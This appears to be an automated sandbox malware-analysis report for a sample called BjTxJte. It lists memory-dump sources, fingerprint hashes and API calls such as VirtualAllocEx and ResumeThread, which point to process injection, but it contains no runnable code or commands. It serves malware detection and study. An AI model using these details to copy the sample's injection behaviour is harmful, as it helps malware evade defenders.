                                                                                      control_flow_graph 467 6ee1080-6ee1103 VirtualAllocEx 471 6ee110c-6ee1131 467->471 472 6ee1105-6ee110b 467->472 472->471
                                                                                      APIs
                                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06EE10F6
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857503131.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6ee0000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 4275171209-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 476 227cea8-227df88 478 227df90-227dfbf LoadLibraryExW 476->478 479 227df8a-227df8d 476->479 480 227dfc1-227dfc7 478->480 481 227dfc8-227dfe5 478->481 479->478 480->481
                                                                                      APIs
                                                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0227DDC1,00000800,00000000,00000000), ref: 0227DFB2
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1849013837.0000000002270000.00000040.00000800.00020000.00000000.sdmp, Offset: 02270000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_2270000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID:
                                                                                      • API String ID: 1029625771-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06EE10F6
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857503131.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6ee0000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 4275171209-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857503131.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6ee0000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID: ResumeThread
                                                                                      • String ID:
                                                                                      • API String ID: 947044025-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,0227DB0C), ref: 0227DD46
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1849013837.0000000002270000.00000040.00000800.00020000.00000000.sdmp, Offset: 02270000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_2270000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID: HandleModule
                                                                                      • String ID:
                                                                                      • API String ID: 4139908857-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857503131.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6ee0000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID: ResumeThread
                                                                                      • String ID:
                                                                                      • API String ID: 947044025-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Te^q
                                                                                      • API String ID: 0-671973202
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: O};5
                                                                                      • API String ID: 0-3558557551
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: O};5
                                                                                      • API String ID: 0-3558557551
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Te^q
                                                                                      • API String ID: 0-671973202
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Te^q
                                                                                      • API String ID: 0-671973202
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 3H5
                                                                                      • API String ID: 0-3899204960
                                                                                      • Opcode ID: 92b6147033b0852603f2ba287864409ea12c5290761cd77b5ff5dde334e5ebf2
                                                                                      • Instruction ID: 9b93c91952d2bbe8b86ac1203fd6b36ee9059087b2375cdcd1e737c5f67b4c17
                                                                                      • Opcode Fuzzy Hash: 92b6147033b0852603f2ba287864409ea12c5290761cd77b5ff5dde334e5ebf2
                                                                                      • Instruction Fuzzy Hash: 5E21697091524ACFCB49DFA9C5806AEFBF1FF8A300F24C1AAD545AB251D7309A45CB81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Te^q
                                                                                      • API String ID: 0-671973202
                                                                                      • Opcode ID: 62dd9764f0e5e59579a89879115e36ff8a06db8c164805d6a3e062f964e493df
                                                                                      • Instruction ID: f703c3ff55eb55ecaba27ffc93bdd5bbd7af245b4b9ba8b6670370c64190e324
                                                                                      • Opcode Fuzzy Hash: 62dd9764f0e5e59579a89879115e36ff8a06db8c164805d6a3e062f964e493df
                                                                                      • Instruction Fuzzy Hash: CF113D71F1020A8BCB94EBB999505FEB6F2AFC4310B55447AD905EB244EF35CE05CBA2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Te^q
                                                                                      • API String ID: 0-671973202
                                                                                      • Opcode ID: eb63c0a55ef49da0392666f77a0f8e843f5bf5d88fc563b63789c9fc9a877d75
                                                                                      • Instruction ID: d3f13c302b94bea9dec71c2f3150c4b512b6df6874f95085b3896b95afeb155c
                                                                                      • Opcode Fuzzy Hash: eb63c0a55ef49da0392666f77a0f8e843f5bf5d88fc563b63789c9fc9a877d75
                                                                                      • Instruction Fuzzy Hash: 37114D75E002198FCF09DFE9C9849ADBBB2FB88310F20812AE919AB355D735A955CB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: .e
                                                                                      • API String ID: 0-2449113350
                                                                                      • Opcode ID: d8fa8a637e381b62afe1131a02a9985ef12b50c70dc96f5765514866b05b9fc3
                                                                                      • Instruction ID: 18bc393bfef6b7b79cc7ed0a146984e917811ae9fef36aa6b14471d489d72d3e
                                                                                      • Opcode Fuzzy Hash: d8fa8a637e381b62afe1131a02a9985ef12b50c70dc96f5765514866b05b9fc3
                                                                                      • Instruction Fuzzy Hash: 72F08CB8D40205CFDB80FBA0DC4459DBBB6FFC5204B245615980A9F316EA318802CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0c93684b9a073cfe4158dff0100e3f72cd6323a3162583bbe66b13ec7515cbea
                                                                                      • Instruction ID: 077d317b0f204031d192bca1b23f6e184a0adf457f27636c90ee695c4e920142
                                                                                      • Opcode Fuzzy Hash: 0c93684b9a073cfe4158dff0100e3f72cd6323a3162583bbe66b13ec7515cbea
                                                                                      • Instruction Fuzzy Hash: 54419BB49197848FC70ACB69D440988BFB0EF8A211F1A91D6D484CF7B3DA35A956CB13
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6e8e2871a220b087bc219c7b6ab93abb39d6757e900168354e9f4332939ad498
                                                                                      • Instruction ID: 428c871e7bb7cb99ca41220b7157138f9be15739112a27d53d4cdadf21b0711a
                                                                                      • Opcode Fuzzy Hash: 6e8e2871a220b087bc219c7b6ab93abb39d6757e900168354e9f4332939ad498
                                                                                      • Instruction Fuzzy Hash: CB411D70909308CFDB84EF6AC5445EDBBFAFB4D311F229059D80AA721AD734AA41CF90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: cd1747f174369b38f5165cdaff8e4819569dff1d4cc5c56e0a1e4ca0f12b9730
                                                                                      • Instruction ID: 5ea3b31390e9ac4b8e09af0ae4a9b3cca3889f41c4581e733dba648c65c2ec97
                                                                                      • Opcode Fuzzy Hash: cd1747f174369b38f5165cdaff8e4819569dff1d4cc5c56e0a1e4ca0f12b9730
                                                                                      • Instruction Fuzzy Hash: E0315C70D08209CFDB48EF9AD5506BEFBF6EB8D302F25E025E819A7242D7704901CBA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c8a6dd985bfd1923bee4dd7c9c5e0aeb8a510ae3181df45d7a1c2de09d3d50c7
                                                                                      • Instruction ID: a7d3c032d75e104592580a169a75e8bf8d81720ed18340fbe32cedd131b49d5f
                                                                                      • Opcode Fuzzy Hash: c8a6dd985bfd1923bee4dd7c9c5e0aeb8a510ae3181df45d7a1c2de09d3d50c7
                                                                                      • Instruction Fuzzy Hash: 834179B5E0020ADFCF48DF95D941AEEBBB2FF88310F249529D905AB350D7749A418B91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2b1283551bdb3e53ceb7ede2e4f9fbd17933ee15a5f4d881d002ad2f144d303d
                                                                                      • Instruction ID: 3ffb58d7e9120daa4e20db2dd206aa6a317093b6d56f96f535375d56af94f887
                                                                                      • Opcode Fuzzy Hash: 2b1283551bdb3e53ceb7ede2e4f9fbd17933ee15a5f4d881d002ad2f144d303d
                                                                                      • Instruction Fuzzy Hash: F3417EB5E0420ADFCF48DF95D9419EEBBB2FF89310F209529D905AB350D7709A41CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e0204f75bf008961bc6483f5411e230831939dee1ecf2f364b5325fdaea1ec48
                                                                                      • Instruction ID: ac997213dd7480b243acdfe4d7c06d36af7c57dbdf4b7ba45313bd2fece439e5
                                                                                      • Opcode Fuzzy Hash: e0204f75bf008961bc6483f5411e230831939dee1ecf2f364b5325fdaea1ec48
                                                                                      • Instruction Fuzzy Hash: 92418070A09225DFD380FB69C845A7AB7F5AB44311F4781B6EA15DB2D6C338D840CB51
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e4219f4eeef0e9dddc96554bce90c55e47572308902aa62a2dd81e1ae85542b1
                                                                                      • Instruction ID: 671be6252c52a7471a90c3645b2f07d0868c0a33cdae615f2e5f512c787765a4
                                                                                      • Opcode Fuzzy Hash: e4219f4eeef0e9dddc96554bce90c55e47572308902aa62a2dd81e1ae85542b1
                                                                                      • Instruction Fuzzy Hash: 23313A75900208AFCB50EFA9D844ADEBFF5EB49310F11846AE919E7311D735E940CFA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1847690260.00000000007CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007CD000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_7cd000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 816765c61e167e4b198240c60aa1203062796a866f71258607a784c0109830e6
                                                                                      • Instruction ID: 90685712975879d30e6ff5967fac3e502fd1f81fe99ccc1833e20857cd13bd59
                                                                                      • Opcode Fuzzy Hash: 816765c61e167e4b198240c60aa1203062796a866f71258607a784c0109830e6
                                                                                      • Instruction Fuzzy Hash: CC21F471504244EFCB259F18D9C4F16BFA5FB98314F24827DE9090A255C33EDC56CBA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 42b193815a2682d3633063ba70a2c8c6249c789dd92784f8ef1106d82ab8baa6
                                                                                      • Instruction ID: c57c9c38d369668e75e7bc85a82b1b1ce97c170ed89d5d54dfcf95b4308afd4f
                                                                                      • Opcode Fuzzy Hash: 42b193815a2682d3633063ba70a2c8c6249c789dd92784f8ef1106d82ab8baa6
                                                                                      • Instruction Fuzzy Hash: CB314970909349CFCB44DFA6C5406EDBFF2EB4A310F1590AAD40AA7256DB349541CF90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1847784384.00000000007DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007DD000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_7dd000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c078df74af853de01458e678431adf45557e0e8742ac5dc76257c08803a1bdde
                                                                                      • Instruction ID: 9692795ed759b208a7df4a98591378dca6d5a7c057339bc66fb1ab5ba7042386
                                                                                      • Opcode Fuzzy Hash: c078df74af853de01458e678431adf45557e0e8742ac5dc76257c08803a1bdde
                                                                                      • Instruction Fuzzy Hash: A421D071604204DFCB24DF24D984B26BBB5EB88314F24C56AD80A4B396C33ADC46CA61
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1847784384.00000000007DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007DD000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_7dd000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a75674703b4ec6590f8a170a11c55f100e67101bcf1a5ee0db367ecca190f99d
                                                                                      • Instruction ID: 0eb1840da74dbc3deb934fc3c5f38d36d70463978847a8128403c985d2d60abe
                                                                                      • Opcode Fuzzy Hash: a75674703b4ec6590f8a170a11c55f100e67101bcf1a5ee0db367ecca190f99d
                                                                                      • Instruction Fuzzy Hash: 6121C2B1604244EFDB24DF14D9C4B26BBB5EB84314F24C56AD8494B356C33ADC46CA62
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 760749e5a37b2d0c659a39641f47509ae5e14247d3a6e5bb8713d2a90d7312d9
                                                                                      • Instruction ID: 130926ed22e8b3196e9035673fd54938c57bb601ddb63df2aca422e6e9813969
                                                                                      • Opcode Fuzzy Hash: 760749e5a37b2d0c659a39641f47509ae5e14247d3a6e5bb8713d2a90d7312d9
                                                                                      • Instruction Fuzzy Hash: E6213B74904309CFDB44EF99C5849EDBFF9FB4D311B229058E81AA7206D734A981CF90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1847784384.00000000007DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007DD000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_7dd000_BjTxJte.jbxd
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1847690260.00000000007CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007CD000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_7cd000_BjTxJte.jbxd
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1847784384.00000000007DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007DD000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_7dd000_BjTxJte.jbxd
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3d4203d6740faea28e815c7560a1a6c151c3ead84bd55597680607038d8f3b96
                                                                                      • Instruction ID: 6d27ab475a25b2fcc8b2048e82b282174e7cd78b9c91c089a6f06dc1fb03c046
                                                                                      • Opcode Fuzzy Hash: 3d4203d6740faea28e815c7560a1a6c151c3ead84bd55597680607038d8f3b96
                                                                                      • Instruction Fuzzy Hash: A9117C74D04218CFDB84FFA9D908AAEBBF5FB49301F129865E811AB351DB709A44CF91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
